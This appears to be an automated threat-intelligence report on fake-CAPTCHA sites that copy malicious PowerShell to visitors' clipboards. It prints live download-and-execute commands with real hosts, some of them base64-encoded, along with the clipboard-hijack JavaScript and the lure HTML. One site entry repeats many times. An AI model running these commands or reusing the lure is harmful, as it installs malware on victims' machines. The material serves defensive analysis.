Threat Intelligence Report

📅 April 22, 2025 🕒 Generated: 2025-04-22 21:03:40 🔍 Sites Analyzed: 33
🌐
33
Total Sites Analyzed
⚠️
25
Malicious Sites
76.0% detection rate
💻
25
PowerShell Commands
📋
73
Clipboard Hijacks
📊
90
Avg Threat Score

Attack Pattern Analysis

49
High Risk Commands
20
Base64 Encoded
0
Obfuscated JS
0
Inline JS Redirects
0
External JS Chains
0
Redirect Follows
PowerShellCommands 25
EncodedPowerShell 0
ClipboardManipulation 49
ObfuscatedJavaScript 0
Base64Strings 20
JavaScriptRedirects 0
JavaScriptRedirectChains 0
RedirectFollows 0
CaptchaElements 340

Top Indicators/Keywords

<script> (25) ✅ (24) I am not a robot (24) reCAPTCHA Verification (24) I'm not a robot (24) To better prove you are not a robot (23) Verification ID (21) Verify You Are Human (20) Verification Hash (3) Command (1)

Malicious Sites Detected

Click on a site to view detailed analysis
2
powershell
3
clipboard
1
downloads
14
captcha
2
high risk commands

💻 PowerShell Commands 2

powershell " + htaPath;
iex (irm 'https://aatox.com/verify/45.ps1')

🔍 Suspicious Keywords 8

Command
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://aatox.com/verify/45.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
2
powershell
3
clipboard
3
downloads
14
captcha
4
high risk commands

💻 PowerShell Commands 2

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
1
powershell
3
clipboard
3
downloads
14
captcha
3
high risk commands

💻 PowerShell Commands 1

powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://yogasitesdev.wpengine.com/2/15.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

Showing top 20 malicious sites. 5 additional sites detected.

Technical Analysis

ClickGrab Threat Analysis Report - 2025-04-22

Most Common External Domains

  • www.google.com: 35 occurrences
  • use.fontawesome.com: 24 occurrences
  • cdnjs.cloudflare.com: 20 occurrences
  • staplebrokenmetaliyro.blogspot.com: 15 occurrences
  • www.blogger.com: 13 occurrences
  • www.webgo.de: 10 occurrences
  • www.w3.org: 6 occurrences
  • t.me: 5 occurrences
  • browser.certif-update.website: 2 occurrences
  • www.blogblog.com: 2 occurrences

Common Pattern Analysis

reCAPTCHA imagery (24 occurrences, 1 distinct URLs)

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (24 times)

Font resources (44 occurrences, 2 distinct URLs)

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (24 times)
  • https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (20 times)

CDN hosted scripts (21 occurrences, 2 distinct URLs)

  • https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (20 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources (37 occurrences, 8 distinct URLs)

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (24 times)
  • https://www.google.com/intl/en/policies/privacy/ (4 times)
  • https://www.google.com/intl/en/policies/terms/ (4 times)
  • http://www.google.com/2005/gml/b (1 times)
  • http://www.google.com/2005/gml/data (1 times)
  • ...and 3 more distinct URLs

JavaScript Clipboard Analysis

Found clipboard manipulation code snippets in 48 places

document.execCommand copy

Found in 48 snippets (100.0% of clipboard code)

Examples:

document.execCommand("copy")

textarea manipulation

Found in 48 snippets (100.0% of clipboard code)

Fake CAPTCHA HTML Examples

Here's how the fake CAPTCHA verification appears in HTML:

Example 1:

<div class="recaptcha-box">
            <h2>Verify You Are Human</h2>
            <p>Please verify that you are a human to continue.</p>
<div class="container m-p">    
        <div id="checkbox-window" class="checkbox-window m-p block">
            <div class="checkbox-container m-p">
                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
            </div>

Example 2:

<div class="recaptcha-box">
            <h2>Verify You Are Human</h2>
            <p>Please verify that you are a human to continue.</p>
<div class="container m-p">    
        <div id="checkbox-window" class="checkbox-window m-p block">
            <div class="checkbox-container m-p">
                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
            </div>

Command Context Analysis

Found 27 PowerShell download context snippets

stageClipboard Function

Found 20 references to stageClipboard function

Example stageClipboard contexts:

Example 1:

...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Example 2:

...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Example 3:

...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Malicious Commands

Found 4 commandToRun declarations

Malicious commands being prepared for clipboard:

Example 1:

Command:

powershell 

Context:

WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...

Example 2:

Command:

powershell 

Context:

 = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...

Example 3:

Command:

powershell 

Context:

...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...

Example 4:

Command:

powershell 

Context:

 = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...

PowerShell Parameters

Found 2 htaPath declarations

Malicious PowerShell parameters:

Example 1:

Parameters:

-w hidden -c \

Context:

...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP

Example 2:

Parameters:

-w hidden -c \

Context:

...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...

Clipboard Attack Pattern Analysis

Based on the data analyzed, here's the complete clipboard attack pattern:

1. Initial Victim Engagement

Victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding

Common elements found: - Google reCAPTCHA logo image - Font resources from CDNs - "I am not a robot" checkbox

Example Fake CAPTCHA HTML:

<div class="recaptcha-box">
            <h2>Verify You Are Human</h2>
            <p>Please verify that you are a human to continue.</p>
<div class="container m-p">    
        <div id="checkbox-window" class="checkbox-window m-p block">
            <div class="checkbox-container m-p">
                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
            </div>...

2. Malicious Code Preparation

When user clicks the verification checkbox:

  • A 'commandToRun' variable is set with a malicious PowerShell command
  • The command is typically obfuscated and often downloads second-stage payloads
  • Common download destinations include:

Example Command Preparation Code:

WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...

3. Clipboard Hijacking

The malicious command is copied to the user's clipboard:

  • A temporary textarea element is created
  • The command is combined with verification text like "[CHECKMARK] I am not a robot"
  • document.execCommand("copy") is used to copy to clipboard
  • The temporary element is removed from the DOM

4. Social Engineering Component

User sees a success message:

  • The verification UI shows success with a checkmark symbol
  • User is told they've passed verification
  • The clipboard now contains the malicious command + verification text

5. Attack Objective

Final stage of the attack:

  • When user pastes the clipboard contents elsewhere (like in terminal)
  • They see what looks like verification text
  • But the PowerShell command at the start gets executed
  • This downloads and runs additional malware from attacker-controlled servers

Reconstructed Attack Example

What's copied to clipboard:

powershell  # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'

What user sees when pasting: A verification success message

What actually happens: PowerShell executes the hidden malicious command

Conclusion

This is a sophisticated social engineering attack that tricks users into:

  1. Thinking they're completing a legitimate CAPTCHA
  2. Unknowingly copying malicious code to their clipboard
  3. Executing malware when they paste what they think is just verification text

Statistics

  • Total sites analyzed: 33
  • Sites with malicious content: 24
  • Total unique domains: 19
  • Total URLs extracted: 142